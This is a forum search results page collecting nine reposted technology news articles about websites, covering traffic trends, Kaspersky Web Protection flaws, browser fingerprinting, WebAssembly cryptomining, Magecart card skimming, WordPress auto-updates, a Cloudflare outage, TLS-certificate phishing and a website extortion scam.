Jump to content

Search the Community

Showing results for tags 'websites'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Found 20 results

  1. If there were any major sites that took a web traffic pummeling in 2019 it was Yahoo and Tumblr. That’s according to a new report from SimilarWeb. The report looks back on key web trends in 2019. Among those trends were some pretty bad news for some sites. Particularly, SimilarWeb’s report says Tumblr saw its web traffic plummet 33% since 2018, when the site banned adult content. Yahoo saw a similar drop from its 2017 numbers, falling 33.6% during the period. Other key findings from the report: Total web traffic is on the rise, growing 8% in 2019 to 223 billion visits per month to the top 100 websites worldwide. Mobile is fueling much of that growth. While desktop web traffic decreased 3.3% since 2017, mobile web traffic shot up 30.6% over the same period. But with the mobile web comes shrinking attention spans. The report says that visitors are spending 49 seconds less on websites per visit than they did three years ago. The top 10 sites took 167.5 billion visits per month in 2019–a 10.7% increase. Mobile visits claim the majority of visits made to “vice” sites–those that involve porn and gambling. The U.S. leads the world when it comes to visiting the websites. In 2019, over 300 billion visits per month to sites were made from America. The takeaway? Mobile is quickly becoming the new norm, but websites are going to have to work harder to keep visitor attention as our attention spans continue to shrink. Source
  2. Updated: The internal API has been subject to not one, but multiple failed fix attempts. Vulnerabilities in Kaspersky software have left an internal API open to abuse by webmasters and attempts to patch have, so far, failed. On Monday, software developer Wladimir Palant documented the saga, which began after he began investigating Kaspersky Web Protection features included in software such as Kaspersky Internet Security 2019. The online protection functionality includes scans of search results to weed out potentially malicious links, ad blocking, and tracking prevention. In December last year, the developer found a set of vulnerabilities and security issues in the Web Protection feature, which can be enabled by any website. Web Protection needs to be able to communicate with the main Kaspersky application and a "secret" signature value, which in theory is not known to web domains, is enabled to ensure secure communication. However, a security flaw permitted websites to elicit this key "fairly easily," according to Palant, and "allow them to establish a connection to the Kaspersky application and send commands just like Web Protection would do." Chrome and Firefox extensions use native messaging to retrieve the signature, whereas Internet Explorer reads script injections. Without a browser extension, Kaspersky will inject its scripts directly into web pages, and this is where the first vulnerability of note, CVE-2019-15685, appeared through the abuse of URL Advisor and frames in order to extract the signature. "Websites could use this vulnerability, for example, to silently disable adblocking and tracking protection functionality," the developer says. "They could also do quite a few things where the impact wasn't quite as obvious." After the flaw was reported, Kaspersky developed a fix in July 2019 by blocking access to some functionality to websites in 2020 products. However, other commands could still be accepted, such as whitelisting websites on adblockers (CVE-2019-15686). A new issue also emerged due to the failed patch; websites were able to access user system data, including unique identifiers of the Kaspersky installation on a PC (CVE-2019-15687). "When I tried the new Kaspersky Internet Security 2020, extracting the secret from injected scripts was still trivial and the main challenge was adapting my proof-of-concept code to changes in the API calling convention," Palant says. "Frankly, I cannot blame Kaspersky developers for not even trying -- I think that defending their scripts in an environment that they cannot control is a lost cause." This inadvertently-introduced data leak was not the end of the story. Palant says that the patch also introduced a new vulnerability that could be used to trigger a crash in the antivirus process, leaving systems vulnerable to compromise, tracked as CVE-2019-15686. The cybersecurity firm then attempted another fix, resolving the data leak and "mostly" fixing the crash issue; websites no longer could trigger a crash, but browser extensions or local applications possibly could. A new patch has been developed and will be made available on November 28, but given a fallback script injection approach rather than relying purely on browser extensions, the developer isn't hopeful when it comes to the true resolution of the problem. "Maybe Kaspersky is so attached to scripts injected directly into web pages because these are considered a distinguishing feature of their product, it being able to do its job even if users decline to install extensions," the developer says. "But that feature also happens to be a security hazard and doesn't appear to be reparable." "One thing won't change, however: websites can still send commands to Kaspersky applications. Is all the functionality they can trigger there harmless? I wouldn't bet on it." Update 14.14 GMT: A Kaspersky spokesperson told ZDNet: "Kaspersky has fixed security issues in the web protection component in its products and product extensions for Google Chrome. These security issues were fixed by patches 2019 I, J and 2020 E, F, which were delivered to users through the automatic update procedures. A reboot may be required to apply these updates. The company also recommends that users make sure that Kaspersky protection extensions for web browsers are installed and enabled. Detailed information about the fixed issues is available on the Kaspersky website." Source
  3. Just when you thought we had hit rock bottom on all the ways the internet could snoop on us - no. We've sunk even lower. Fingerprinting isn't yet as widespread as cookies, those tiny files websites drop in your browser to track you. But it's concerning because it's much, much more aggressive. There's a tactic spreading across the web named after treatment usually reserved for criminals: fingerprinting. At least a third of the 500 sites Americans visit most often use hidden code to run an identity check on your computer or phone. Websites from CNN and Best Buy to porn site Xvideos and WebMD are dusting your digital fingerprints by collecting details about your device you can't easily hide. It doesn't matter whether you turn on "private browsing" mode, clear tracker cookies or use a virtual private network. Some even use the fact you've flagged "do not track" in your browser as a way to fingerprint you. They're doing it, I suspect, because more of us are taking steps to protect our data. Privacy is an arms race - and we are falling behind. Fingerprinting happens when sites force your browser to hand over innocent-looking but largely unchanging technical information about your computer, such as the resolution of your screen, your operating system or the fonts you have installed. Combined, those details create a picture of your device as unique as the skin on your thumb. Sites can use your digital fingerprint to know if you've visited before, create profiles of your behavior or make ads follow you around. They can also use it to stop you from sharing a password, identify fraudsters and block harmful bots. Fingerprinting has been around for more than a decade but considered mostly a theoretical threat for you and me. Not any more. I asked Patrick Jackson, chief technology officer of privacy software company Disconnect, to test for signs of fingerprinting on the 500 most popular websites used by Americans. He revealed what these sites hide in their code and do on our computers that we don't get to see on our screens. I'm naming names. Of the 183 likely fingerprinters Jackson identified between September 30 and October 8, I asked 30 of the most well-known to explain their behaviour. (See below for a list.) Some claimed it was industry-standard to fingerprint. Many said they didn't realise it was happening or never collected our data themselves, because they had let ad and data partners operate parts of their websites. After hearing from me, six sites said they would remove fingerprinting code, including four run by the US government. It's happening on sites you wouldn't think would be so intrusive, including Thesaurus.com and AllRecipes.com - even security and privacy software maker Norton.com. Two porn sites didn't answer my questions, but Jackson suspects they're using it to track and tailor content to the people who view them in private-browsing modes that turn out to be not so private. The Washington Post website fingerprints visitors when they've blocked cookies, which ought to be a signal visitors don't want to be tracked. In different ways, the Fox News and New York Times websites do it, too. Fingerprinting isn't yet as widespread as cookies, those tiny files websites drop in your browser to track you. But it's concerning because it's much, much more aggressive. "Fingerprinting is designed to be user-hostile," said Jackson. "It even takes the fact that you don't want to be tracked as a parameter to make your fingerprint more unique." Google, Apple and Mozilla, which make the world's most-used browsers, rarely agree on much, but they've all identified fingerprinting as a growing threat. "Because fingerprinting is neither transparent nor under the user's control, it results in tracking that doesn't respect user choice," wrote Google's Chrome browser engineers in May. What's at stake is a pretty fundamental attribute of the web: anonymity. One of the original benefits of the internet is that anyone can express themselves and access information without fear. But to update an adage: Now on the internet, they definitely know you're a dog. Why are some of the most well-known websites doing this? And what can we do to stop it? It's another tale of the tech industry putting its own concerns ahead of your privacy. How they fingerprint you Fingerprinting sites don't necessarily know you by name. But they're connecting the dots on information that could be just as valuable. When you load a site, fingerprinting code starts asking your computer for things that aren't part of the usual process of drawing a page. Knowing what operating system you're running, what fonts you have installed or what your address is on your internal network makes you look different from other people visiting the site. Some sites use as a signal whether people have turned on the "Do not track" flag in their browser. (That's not ironic; it's malicious.) Many times, fingerprinting code will run the digital equivalent of a sonar test, sending out a signal just to see what comes back. Website code instructs your browser how to draw out text. The coding in it for fingerprinting can include words or icons that never show up on your screen, letting websites track minute differences in how each device responds. The Best Buy website used this invisible ink to write "F1n63r,Pr1n71n6!" - stand back and you might see it spells out "fingerprinting!" Every site draws on different data points to build your fingerprint, which is part of what makes it so hard to stop. In his tests, which weren't definitive, Jackson just flagged the most suspicious behaviour. Apps can fingerprint, too, using even more attributes available on phones and tablets. Engineer Valentin Vasilyev helped take fingerprinting beyond academic research with free software called Fingerprint2.js. We found traces of it used on many websites. A demonstration on his site, which claims it has "99.5 percent identification accuracy," correctly spotted my browser a half-dozen times over a week. Vasilyev told me fingerprinting just connects the dots on information browsers already make public - and he can't be held responsible for how people use it. "By creating this product, I just showed everyone including browser vendors and researchers how it can be done," he said. A "pro" version he sells "is mostly companies trying to protect themselves" from issues such as fraud, he said. A digital strip search It's true that not all fingerprinting is used for devious purposes. But it is the digital equivalent of airport security conducting strip searches of everyone. More effective? Perhaps. Good? No. Chase, Wells Fargo, Airbnb, Best Buy, eBay and Marriott told me fingerprinting lets them bolster security, such as fighting attempts to use stolen credit cards or passwords. (A device looks suspicious if it attempts to try many different card numbers or logins.) Textbook firm Cengage said it was stopping piracy and tailoring content. The New York Times and Fox News said fingerprinting was helping identify automated bots that might interfere with site operation. "We don't use fingerprinting to track our readers and have internal rules forbidding it," said Times spokeswoman Danielle Rhoades Ha. "The simple act of producing a fingerprint is not aggressive; using it to target a user would be." We discovered four federal agencies - the Internal Revenue Service, State Department, Citizenship and Immigration Services, and National Weather Service - had fingerprinting code as part of a customer satisfaction survey, to keep from repeatedly asking people to fill out the questionnaire. After I reached out, they all said they would update their software to remove it. (The vendor that provides that software, Verint, said the code was added as part of a test and was "unutilized.") Marketing appeared to be the largest use for fingerprinting among the sites Jackson identified. Sites including Reddit and Thesaurus.com said it helps protect advertisers against fraud and sensitive content - all the while allowing a firm called DoubleVerify to probe details about the computers of millions of people. (The company didn't answer my questions about how it uses data, how long it holds onto it or how it protects it.) Payroll firm ADP uses fingerprinting scripts from at least two ad-tech firms to support its marketing. "The data collected during this standard practice is anonymous, non-identifiable and aggregated," said spokeswoman Allyce Hackmann. Some claim the tech is anonymous because it identifies computers and phones rather than people's names. Washington Post spokeswoman Molly Gannon said, "The Post is using industry-standard advertising systems to support our ad business and serve our users relevant ads." Just because fingerprinting is becoming common doesn't make it right. Most sites don't expressly state they're fingerprinting in privacy policies, much less make it clear how they and their partners might use and share the data. What's the big worry? It's hard to know how this snooping might be used to harm or exploit us. "Data collected today can be used against us today, tomorrow or even 10 years from now," says Jackson, who used to work for the National Security Agency. "Your browsing history, the apps you use and the data you give companies can lead to voter manipulation, targeted behavior modification, and further aids the mass surveillance of our activities on and offline." At least a few sites understood fingerprinting was an ethical issue. After I contacted it, AccuWeather told its ad firms to cut it out. So did Comcast, one of the country's largest media companies. When I reported we found its Xfinity.com site fingerprinting users, Comcast removed the code - and made the ad firm that had been collecting the data confirm it didn't store or share any of it. "We don't use fingerprinting trackers on our website, and we don't permit our business partners and service providers to do so," said Comcast spokeswoman Jennifer Khoury. "We'll be performing regular site scans to prevent this from happening and are putting in place additional review systems for our partners." How to fight back Fingerprinting isn't like other online snooping. We can't entirely stop it by blocking cookies or making other simple changes to our browsers. The tactics keep evolving. The good news is that there are gradations of certainty in fingerprinting - not all devices and browsers are equally easy to detect. Vasilyev, who created fingerprinting software, said it is still possible to make yourself hard to fingerprint by using software such as Tor. It's a privacy-first browser that goes to great lengths to make each user's device look the same - but only useful for highly technical people because it breaks common websites. You can also get some protection from more consumer-friendly software. Apple iPhones, iPads and Macs running the company's Safari browser are among the hardest to fingerprint. That is, in part, because Apple has a relatively limited product line and those devices tend to be standardized - so they look more similar to fingerprinting software (compared to the zillions of variations in Android phones and Windows laptops out there). It's a kind of online herd immunity. Apple's Safari also has been tackling fingerprinting directly by reducing the amount of information it shares, such as a list of built-in fonts (instead of custom ones). Safari also asks you for permission before handing over information about your device orientation and motion, two more potential data points for fingerprinters. You don't have to adjust any settings to turn these protections on - they're the default. However, most people in the world do not own Apple devices. Everyone else should consider the Firefox browser, which I've recommended before because of its aggressive default protection from tracker cookies. It's in the final stages of adding some default fingerprinting protections, too, based around blocking traffic from known fingerprinting addresses - which, it acknowledges, fixes only part of the problem. You can turn on an early version of these protections now by going to the "Custom" tab under privacy and security settings. Google's Chrome browser currently doesn't do much to stop fingerprinting by default. You can add browser privacy extensions such as uBlock Origin, the Electronic Frontier Foundation's Privacy Badger or Jackson's Disconnect to help stop some fingerprinting. But beware this software might break some of the sites you want to visit. In May, Google promised it was going to join the fingerprinting fight - an important move because Chrome is by far the most-used browser. It says its plans include reducing the way browsers can be "passively" fingerprinted, so that it can detect and intervene against "active" fingerprinting efforts as they happen. When these changes arrive on Chrome in the first half of 2020, they should make a difference. That is, until it's time for the next round of battle against the snoops. FINGERPRINTERS: Accuweather.com* Adobe.com Adp.com Airbnb.com Allrecipes.com Bestbuy.com Cengage.com Chase.com Cnn.com Costco.com Ebay.com State.gov* Foxnews.com Hotels.com Imdb.com Irs.gov* Marriott.com Norton.com Nytimes.com Reddit.com Thesaurus.com Uscis.gov* Washingtonpost.com Weather.gov* Wellsfargo.com Xfinity.com* Xvideos.com Yahoo.com (* = said it would stop) Paywall Source Free Source
  4. A study published in June 2019 reveals that in the Alexa Top 1 million websites, one out of 600 sites executes WebAssembly (Wasm) code. The study moreover finds that over 50% of those sites using WebAssembly apply it for malicious deeds, such as cryptocurrency mining and malware code obfuscation. Marius Musch, Christian Wressnegger, Martin Johns, and Konrad Rieck, in a study sponsored by the Institute for Application Security and the Institute of System Security from the Technische Universität Braunschweig, analyzed the prevalence of WebAssembly in the Alexa Top 1 million websites. The team examined the websites in the Alexa sample over a time span of four days, and successfully studied 947,704 websites, eventually visiting 3,465,320 web pages. The study provides novel information about the prevalence of WebAssembly, the extent of its usage by the websites featuring Wasm modules, and categorizes WebAssembly usage purpose by those sites. 1,950 Wasm modules were found on 1,639 sites (roughly one site out of 600). An important portion of these modules is not loaded on the front page of a site, but on subpages, often through a third-party script or iframe with another origin (795 sites from the sample). The study reports that the 1,950 Wasm modules represent 150 unique samples, indicating that some Wasm modules are found on several sites, with the extreme case of one module being present on 346 different sites. Conversely, 87 samples are unique to a website, indicating a custom development for that particular website. On average, sites using WebAssembly use 1.2 Wasm module per page visited by the study. Ranking-wise, sites with a lower Alexa rank, i.e. higher user traffic (google.com for instance ranks first) tend to use WebAssembly more often. The study also provided data about the extent of usage of WebAssembly in relevant websites, using two indicators to that purpose. The first is the size of the WebAssembly module, ranging from 8 bytes to 25.3MB, with a median value of 100KB per module. This can be explained by the difference in WebAssembly usage purpose. The study reports that some sites just test if the browser does support WebAssembly, while other sites are actually relying on the functionality the module exposes. The second indicator, WebAssembly relative usage vs. JavaScript as extracted by Chrome’ browsers integrated performance profiler, shows two clear segments. On the one hand, a majority of sites (1121 sites or roughly two-thirds of the sample) almost never use WebAssembly. On the other hand, the rest of the sites are nearly exclusively spending time running the Wasm code. The research team manually categorized the Wasm modules in 6 categories, reflecting the purpose behind the use of WebAssembly: Custom, Game, Library, Mining, Obfuscation, and Test. Of these six categories, two (Mining – 55,6% of website sample, and Obfuscation – 0,2% of websites sample) represent malicious usage of WebAssembly. The study details: The largest observed category implements a cryptocurrency miner in WebAssembly, for which we found 48 unique samples on 913 sites in the Alexa Top 1 Million. (…) 56%, the majority of all WebAssembly usage in the Alexa Top 1 Million is for malicious purposes. Wasm samples in the Mining category exhibit unique traits vs. modules from other categories. The collected WebAssembly miners’s code share a high similarity. Furthermore, profiling data indicates that the vast majority of websites with intense usage of Wasm (more than 50% of the time spent running WebAssembly code) are indeed mining for cryptocurrencies. A manual analysis of the modules in the Mining category, and which did not display intense Wasm code usage (relative CPU share below 50%) indicates four key reasons for the failure to run Wasm code: A mining script is included, but the miner is not started or was disabled and the script not removed. The miner only starts once the user interacts with the web page or after a certain delay. The miner is broken, either because of invalid modifications or because the remote API has changed. The WebSocket backend is not responding, which prevents the miner from running. The study concludes: [The study] suggests that we are currently only seeing the tip of the iceberg of a new generation of malware (…). In consequence, incorporating the analysis of WebAssembly code hence is going to be of essence for effective future defense mechanisms. The full study is available online. A shorter presentation summarizing the results of the study can also be consulted. The data collection methodology defines a site as one entry in the Alexa list, together with the pages that share the same origin with that entry. The research team instrumented a browser to collect all WebAssembly code. As a preliminary study revealed that a significant fraction of the Wasm code is not loaded when visiting the front page of a domain, the study collected data from three randomly selected links from the front page. This led to identifying 25% more sites that use WebAssembly and to collecting 40% more unique samples, compared to a crawl of the same sites without any subpages. The research team additionally used a profiler to gather information about the CPU usage of the visited sites, allowing the team to assess the percentage of time spent executing JavaScript and WebAssembly code. For profiling purposes, the research team measured the execution time of Wasm and JavaScript code and excluded all other factors like idle times when waiting for network responses. At a technical level, the research team transparently hooked the creation of all JavaScript functions which can compile or instantiate Wasm modules. This includes the instantiate method, the instantiateStreaming method, the WebAssembly.Module constructor and more. Alexa provides website traffic statistics, among which a website traffic ranking. The rank is calculated using a proprietary methodology that combines a site’s estimated average of daily unique visitors and its estimated number of pageviews over the past three months. The Technische Universität Braunschweig (Braunschweig Institute of Technology) is the oldest Technische Universität (comparable to an institute of technology in the American system) in Germany and ranks among the top universities for engineering in Germany. Source
  5. With over two million detections to date, compromising shopping sites' resources to steal customer payment card info is a global phenomenon unlikely to end soon. These attacks are collectively known as Magecart and there are multiple groups currently in the business, some more advanced than others. They target online payment forms and steal card data at checkout, a cybercriminal activity known as web skimming. This is done by loading at checkout JavaScript code designed to copy payment data and to send it to the attackers' server. Getting the code on the checkout page is possible by breaching the website directly or by compromising a web resource from a third party that is loaded on the page, such as an analytics script or a customer support widget. Millions of Magecart instances detected In a report released today, RiskIQ notes that the first Magecart threat they observed was on August 8, 2010. The phenomenon did not take off until last year, though, when British Airways, Ticketmaster, OXO, and Newegg were hit. Since then, multiple attackers emerged creating dozens of card info skimming scripts and infecting thousands of websites. In one automated attack alone, over 960 stores were compromised. RiskIQ estimates that the Magecart threat may have impacted millions of users. Their telemetry data shows a total of 2,086,529 instances of Magecart detections. According to the company, supply-chain attacks account for the highest spikes in Magecart detections. "Suppliers can include vendors that integrate with sites to add or improve site functionality or cloud resources from which websites pull code, such as Amazon S3 Buckets. These third-parties integrate with thousands of websites" - RiskIQ Out of all Magecart groups tracked by security researchers, Group 5 is the most prolific and advanced. They focus on third-party suppliers, like website analytics providers SociaPlus and Inbenta, and skim payment details from hundreds of websites. Unsecured or misconfigured Amazon S3 buckets are also among the targets, as they often store resources used by a large number of domains. One actor set sight on them and automated the discovery and compromise process to impact more than 17,000 domains. Since the beginning of the campaign in early April this year, RiskIQ monitored the compromise of S3 buckets and recorded worrying statistics: over 18,000 hosts with Magecart AWS injects. Attackers monitor security developements Many of the Magecart groups that RiskIQ tracks still focus on the Magento shopping platform, which was the main target when these attacks started to multiply. OpenCart is also of particular interest to the attackers. Attackers keep a close eye on the development of these shopping cart platforms and vulnerabilities discovered in one of them are normally followed by a spike in the number of victims. The victim context is reversed when a patch is released and admins start applying it. The graph below shows how the number of victims fluctuates according to Magento security developments. Taking any opportunity While the details above clearly show how prevalent is Magecart, they do not tell the full story of the phenomenon as the threat actors are constantly looking for new ways to distribute their web skimming scripts. RiskIQ observed a new set of targets as "Magecart groups are also compromising creative ad script tags to leverage digital ad networks to generate traffic to their skimmers on thousands of sites at once." Of all malicious advertisements, the company discovered the 17% distribute the Magecart threat. As for the average time of a breach, the code survives on average for 22 days. The reason is that many victims are unaware that their website loads malicious JavaScript. New Magecart actors are likely to appear since Magecart has spread so widely that its infrastructure is a common occurrence. Much of it is managed by responsible security parties making sure that traffic from the victims does not reach the bad guys. This is done by taking the malicious domains used to serve the web-skimming code and/or receive the card information. The bad news is that many of these domains end up being released to the public pool as the registrar takes them offline or puts them on hold. Since many Magecart scripts continue to be active on victim websites, malicious actors buy the released domains and resume their activity. As if all this was not enough, researchers from IBM X-Force Incident Response and Intelligence Services (IRIS) published last week a report about Magecart Group 5 testing card stealing scripts that are injected into websites through commercial routers providing WiFi in public spaces like airports, hotels, casinos or resorts. One of the scripts, 'test4.html', has code to interact with commercial-grade Layer 7 routers that can provide WiFi connectivity after passing through a captive portal that sets some conditions, like paying for the service or viewing ads. Another script indicates that the actor aims at infecting Swiper, an open-source JavaScript library used by about 300,000 to make websites built for desktop viewing compatible with mobile devices. Add some safety measures Putting an end to these incidents may not be a realistic endeavor for the moment but there are ways to reduce their frequency. Merchants can enable checks on third-party resource integrity through Content Security Policy (CSP) that allows loading JavaScript from a trusted list of domains and block the attackers' domain. Another option is Subresource Integrity (SRI), which prevents loading modified JavaScript code by checking a cryptographic hash for the legitimate resource. Consumers have few options to stay safe against Magecart. Using browser plugins that block loading of JavaScript helps in the case of untrusted websites but it's of no use with those already whitelisted. A more technical approach, which has obvious shortcomings for the average user, is to block connections to domains and IP addresses used by the attackers. Source
  6. WordPress team wants to forcibly auto-update older WordPress versions to newer releases. The developers behind the WordPress open-source content management system (CMS) are working on a plan to forcibly auto-update older versions of the CMS to more recent releases. The goal of this plan is to improve the security of the WordPress ecosystem, and the internet as a whole, since WordPress installations account for more than 34% of all internet websites. Officially supported versions include only the last six WordPress major releases, which currently are all the versions between v4.7 and v5.2. The plan is to slowly auto-update old WordPress sites, starting with v3.7, to the current mimum supported version, which is the v4.7 release. This will be done in multiple stages, as follows: 2% of all WP 3.7 sites will be auto-updated to WP 3.8 After a week, another 18% will be auto-updated to WP 3.8 After two weeks, 80% of WP 3.7 sites will be auto-updated to WP 3.8. Repeat the same steps as above, but migrating sites from WP 3.8 to WP 3.9; WP3.9 to WP 4.0; and so on. The WordPress team said it plans to monitor this tiered forced auto-update process for errors and site breakage. If there's something massively wrong, then auto-update can be stopped altogether. If only a few individual sites break, than those site will be rolled back to their previous versions and the owner will be notified via email. "The email should be a strongly-worded warning, letting them know that their site could not be upgraded to a secure version, and that they should manually update immediately. If they don't update, it's almost guaranteed that their site will be hacked eventually," said Ian Dunn, a member of the WordPress dev team. A first auto-update plan would have wreaked havoc on the internet This looks like a sensible solution, but an earlier proposal had the WordPress team forcibly update all old WordPress sites to version 4.7 at once. This idea was quickly scraped after an avalanche of negative feedback from WordPress site owners who warned that millions of sites would have gone down with WSOD (white screen of death) errors caused by incompatibilities between themes, plugins and the newer WordPress core version. The tiered forced auto-update is the result of the feedback, and one that takes possible site breakage into account. Furthermore, the WordPress team plans to allow site owners to opt out of this forced update process. The WordPress team plans to send emails to website administrators and show a stern warning in websites' dashboards before starting the auto-update process. These warnings will also include opt-out instructions, and will be shown/sent at least six weeks before a site is forcibly auto-updated. "They'll be warned about the security implications of opting-out," Dunn said. More than 3% of the internet runs outdated WordPress sites The finer details of the auto-update process have not been finalized yet, but a source has told ZDNet that the WordPress security team hopes to auto-update all old sites within a year. Versions prior to v3.7 will not be auto-updated because v3.7 is the version in which the auto-update mechanism was included in the CMS. These older versions only support manual updates and can't be auto-updated. Versions prior to v3.7 account for under 1% of all WordPress installations, though, so this won't be a big issue. WordPress sites running versions from v3.7 to v4.7 account for 11.7% of all WordPress sites, which is roughly in the tens of millions of sites range. That's about 3% of all internet sites, currently running extremely old WordPress versions. WordPress 3.7 was released in October 23, 2013, while the current minimum "safe" version, v4.7, was released in December 2016. It was foreshadowed last year While the plans to go with a forced update has shocked some members of the webdev community, it has not surprised ZDNet. We knew it was coming because the WordPress security team hinted about it last year. In a talk at the DerbyCon 2018 security conference, WordPress Security Team lead Aaron Campbell said his team was working on "wiping older versions from existence on the internet." This is what he meant. The reason behind the WordPress dev team's desire to forcibly update all older CMS versions to the new one is because of man-power. For the past six years, WordPress developers have been backporting every single security patch for all versions going back to WordPress 3.7. While this was doable in the beginning, as the WordPress CMS moved forward, it took up more and more time because WordPress devs had to convert newer PHP code into one that's compatible with the older WordPress codebase. "That sucks for us as a security team," Campbell said about this process, last year at DerbyCon. "But it's absolutely the best thing for our users. And because that's where we set the measure of success, that's what we do." By moving all users to WordPress 4.7 (and then 4.8, 4.9, etc), developers are also making their lives easier, but also keeping the internet more secure, as a whole. Currently, WordPress is the most targeted CMS today, mainly due to its large adoption and huge attack surface. Reducing the attack surface is the easier way to combat malware botnets that take over WordPress sites and use them to host malware, SEO spam, or launch DDoS attacks. Source
  7. Cloudflare has gone down around the world and vast numbers of websites have gone down with it. The company provides cloud computing services to millions of people, meaning that a lot of websites are not accessible. One of these is Down Detector, which tracks outages, meaning people can’t even see if the website they want to visit is working or not. The chat service Discord has also stopped working as well as a number of other prominent pages. Matthew Price, Cloudflare CEO, tweeted: ‘Aware of major @Cloudflare issues impacting us network wide. Team is working on getting to the bottom of what’s going on. Will continue to update.’ One person tweeted: Cloudflare, possibly the largest internet/networking company in the world doesn’t have any kind of automated visibility on downtimes. does that not concern anyone? ‘Half their network is down and their status page says “all systems OK!’ they claimed. The outage appears to have started in the past hour. Unable to check Down Detector for updates, people took to Twitter in a quest for answers. ‘Sure is great that when Cloudflare goes down it takes half the Internet with it,’ one person wrote. Another roared: ‘Typical illustration of how bad the internet is centralized nowadays: Cloudflare is down, most websites & services being disrupted by this.’ The outage caused problems with the cryptocurrency website Coindesk, which tweeted: ‘ Due to a Cloudflare outage, we’re getting bad data from our providers, which is showing incorrect crypto prices. ‘Calm down everyone, Bitcoin is not $26.’ The outage appears to have been resolved now. Price added: ‘Appear to have mitigated the issue causing the outage. Traffic restored. Working now to restore all services globally. More details to come as we have them.’ Source
  8. Criminals are using TLS certificates to convince users that fraudulent sites are worthy of their trust. One of the most common mechanisms used to secure web browser sessions — and to assure consumers that their transactions are secure — is also being used by criminals looking to gain victims' trust in phishing campaigns. The FBI has issued a public service announcement defining the problem and urging individuals to go beyond simply trusting any "https" URL. Browser publishers and website owners have waged successful campaigns to convince consumers to look for lock icons and the "https:" prefix as indicators that a website is encrypted and, therefore, secure. The problem, according to the FBI and security experts, is that many individuals incorrectly assume that an encrypted site is secure from every sort of security issue. Craig Young, computer security researcher for Tripwire’s VERT (vulnerability and exposure research team) recognizes the conflict between wanting consumers to feel secure and guarding against dangerous over-confidence. "Over the years, there has been a battle of words around how to communicate online security. Website security can be discussed at a number of levels with greatly different implications," he says. "On its own, however, the padlock does not actually confirm that the user is actually connected with a server from the business they expect," Young explains. "Unfortunately, there is still no solid solution for empowering the general public to discern phishing or scam sites with 100% effectiveness." In the FBI's PSA, the bureau points out that criminals are increasingly incorporating website certificates in phishing email messages impersonating known companies and individuals. The trustworthy-looking URLs take the victims to pages that seek sensitive and personal information. "This isn’t new; cyber criminals have been orchestrating these kinds of phishing campaigns for several years," says Kevin Bocek, vice president of security strategy and threat intelligence at Venafi. He explains, "In 2017, security researchers uncovered over 15,000 certificates containing the word 'PayPal' that were being used in attacks. Since then it’s become clear that bad actors have an entire supply chain in place on the dark web to get trustworthy TLS certificates to use in all kinds of malicious attacks." Bocek says that researchers have found definitive evidence of TLS certificates for sale on the dark web, with prices for highly trustworthy certificates reaching more than a thousand dollars. He sees greater visibility and transparency as key assets in fighting the proliferation of these "trustworthy" certificates used in fraudulent ways. Other technologies may eventually provide additional weapons against the criminals. Young says, "In the long run, the best available solution to this problem is probably the use of newer standards like WebAuthN to prevent naïve users from inadvertently divulging site credentials to a phisher." The FBI's PSA doesn't recommend new technology, instead suggesting behavioral defenses against the phishing attacks. The Bureau recommends questioning the intent of email messages, confirming the authenticity of messages before divulging sensitive information, looking for mis-spellings or domain inconsistencies, and tempering the overall trust in a site simply because it displays a green lock icon. Source
  9. A new extortion scam campaign is underway that is targeting websites owners and stating that if they do not make a payment, the attacker will ruin their site's reputation and get them blacklisted for spam. We all know, or should know, about the sextortion emails people are receiving where the sender states they have hacked the recipient's computer and taped them doing things while on adult sites. Since then, further extortion scams were created that pretend to be the CIA, bomb threats, and even from hitmen asking you to pay them to call off their hit. In this new variant, scammers are utilizing a web sites contact's form to send messages to site owners with a subject of "Abuse and lifetime blocking of the site - example.com. My requirements". The demands then state the sender will destroy the reputation of the site if a .3 bitcoin (approximately $2,400) payment is not paid to them. Extortion Email If a payment is not made, the extortionist states that they will send millions of emails from your domain, leave nasty reviews about the recipient's site, and submit nasty messages to other people's contact forms pretending to be from your domain. All of this being done to ruin the reputation of the site. Extortion Email Says: Hey. Soon your hosting account and your domain xxx.nl will be blocked forever, and you will receive tens of thousands of negative feedback from angry people. Here is a list of what you get if you don’t follow my requirements: + abuse spamhouse for aggressive web spam tens of thousands of negative + reviews about you and your website from angry people for aggressive + web and email spam lifetime blocking of your hosting account for + aggressive web and email spam lifetime blocking of your domain for + aggressive web and email spam Thousands of angry complaints from angry + people will come to your mail and messengers for sending you a lot of + spam complete destruction of your reputation and loss of clients + forever for a full recovery from the damage you need tens of thousands + of dollars Do you want this? If you do not want the above problems, then before June 1, 2019, you need to send me 0.3 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL How do I do all this to get this result: 1. I will send 30 messages to 13 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people. And everyone will not care that it is not you. 2. I’ll send 300 messages to 9,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address xxx.nl and your contact details. And then send out abusive messages with the address of your site. 3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315900 sites from which you will definitely get a huge amount of abuse) of your site xxx.nl. After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life. Your domain registrar will also block your domain permanently. Receiving an email like this is scary, especially when someone threatens your website, which may be your livelihood. With that said, it is important to understand that this attacker is sending these to many sites, it is just a scam, and that they are not going to take the effort to ruin your site's reputation. If you receive one of these emails, simply mark it as spam or delete it. Source
